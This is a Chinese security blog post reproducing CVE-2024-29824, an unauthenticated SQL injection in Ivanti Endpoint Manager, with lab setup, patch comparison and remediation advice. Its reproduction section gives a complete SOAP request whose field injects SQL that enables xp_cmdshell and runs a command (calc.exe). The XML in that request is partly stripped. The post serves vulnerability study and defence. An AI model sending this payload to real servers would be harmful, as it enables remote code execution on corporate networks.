专栏名称: TimelineSec
安全圈必备公众号之一!专注于最新漏洞复现!内含漏洞时间线工具靶场等干货!记录每一个漏洞,捕捉安全的每一瞬间!
目录
相关文章推荐
游戏葡萄  ·  曾推动DNF和LOL签约的腾讯助理总经理,离 ... ·  2 天前  
叶子猪游戏网  ·  S15唯一100%胜率打野!全球LOL战队都 ... ·  3 天前  
51好读  ›  专栏  ›  TimelineSec

CVE-2024-29824:Ivanti EPM SQL注入漏洞

TimelineSec  · 公众号  ·  · 2024-06-19 18:11

正文

关注我们 ❤️,添加星标 🌟,一起学安全!
作者:七安@Timeline Sec
本文字数:2351
阅读时长:2 ~ 4min
声明:仅供学习参考使用,请勿用作违法用途,否则后果自负

0x01 简介

Ivanti Endpoint Manager (EPM) 是一款由 Ivanti 公司开发的综合性端点管理解决方案。它旨在帮助企业有效管理和保护其网络中的所有端点设备,包括桌面、笔记本电脑、服务器、移动设备和虚拟环境。

0x02 漏洞概述

漏洞编号:CVE-2024-29824

攻击者可以利用该漏洞进行未授权的 SQL 注入并可以执行系统任意代码。官方的公告中提出的是:

An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to execute arbitrary code.

Ivanti EPM 2022 SU5 及更早版本的核心服务器中存在未指定的 SQL 注入漏洞,允许同一网络内未经身份验证的攻击者执行任意代码。(此设备内网环境中使用偏多)

0x03 影响版本

version <= Ivanti EPM 2022 SU5

0x04 环境搭建

下载安装包,需要注意的是:Ivanti Endpoint Manager 需要安装 Windows Server 下

然后一直点下一步就好了,安装过程大概需要 30 分钟左右,由于并没有许可,所以我们选择试用。

激活之后访问 https://IP 即可,这里访问首页会得到如下错误

这个错误并不影响我们漏洞复现,因此可以不纠结这个错误

0x05 漏洞复现

使用 BP 发送请求

使用 Process Hacker 查看进程,可以到 calc.exe 已经在后台运行,执行命令成功。

完整数据包:

POST /WSStatusEvents/EventHandler.asmx HTTP/1.1
Host: host
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Content-Type: application/soap+xml
Content-Length: 720

"1.0" encoding="utf-8"?>
"http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
  
    "http://tempuri.org/">
      string
      
        "string" code="0" date="0" type="96" user="string" configguid="string" location="string">
          GoodApp=1|md5='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'calc.exe'--
        

      

    

  

0x06 补丁对比

具体的分析可以看 horizon3

JetBrains dotPeek 搜索函数可以使用 Navigate -> Go to Symbol... 进行搜索。

在 2022 SU5 中 RecordGoodApp 函数内容如下:

在这段代码中开发直接将用户输入与 SQL 语句通过字符串拼接在一起,最终导致了 SQL 注入并可以执行系统命令。而在补丁中

开发者将 SQL 查询改为了参数化查询,将用户的输入作为参数传递进去,有效防止了 SQL 注入

0x07 修复方式

  1. 更新补丁,可以在 https://forums.ivanti.com/s/article/KB-Security-Advisory-EPM-May-2024?language=en_US 下载该漏洞的补丁
  2. 不要开发到公网上

参考链接

  • https://www.horizon3.ai/attack-research/attack-blogs/cve-2024-29824-deep-dive-ivanti-epm-sql-injection-remote-code-execution-vulnerability/
  • https://forums.ivanti.com/s/article/KB-Security-Advisory-EPM-May-2024?language=en_US






请到「今天看啥」查看全文